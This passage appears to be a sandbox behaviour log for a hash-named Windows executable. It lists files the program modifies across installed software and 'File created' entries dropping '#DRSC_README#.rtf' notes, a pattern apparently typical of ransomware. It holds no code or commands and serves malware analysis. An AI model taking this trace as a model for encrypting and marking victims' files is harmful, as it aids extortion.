9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\mr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5EDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-7 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\SetNew.vsdm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8PDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Knox 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaws.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\icudtl.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fa.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Sofia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa 